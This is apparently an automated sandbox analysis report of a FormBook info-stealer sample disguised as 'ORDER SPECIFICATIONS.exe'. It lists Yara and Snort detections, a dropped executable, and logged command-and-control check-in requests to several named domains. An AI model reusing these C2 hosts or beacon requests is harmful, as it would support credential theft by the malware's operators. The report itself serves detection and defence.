Source: Yara match	File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: ORDER SPECIFICATIONS.exe

Joe Sandbox ML: detected

Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: ORDER SPECIFICATIONS.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: ORDER SPECIFICATIONS.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe

Software Vulnerabilities:

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 4x nop then jmp 0725D85Ch		0_2_0725D6FF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		0_2_0725F2E8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.athomecp.com/owws/

Source: global traffic	HTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: www.abaplants.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 07:57:48 GMTContent-Type: text/htmlContent-Length: 1039Connection: closeSet-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnlyCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 7

Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmp	String found in binary or memory: http://en.wX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: http://instagram.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsoft.nh
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comaYn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comoitu
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comon
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.come
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Micr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/dn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ico
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma-d
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krF
Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comBR
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comtn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comxR
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://embed.typeform.com/embed.js
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://plus.google.com/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/organizacao/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/casarpontocom

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
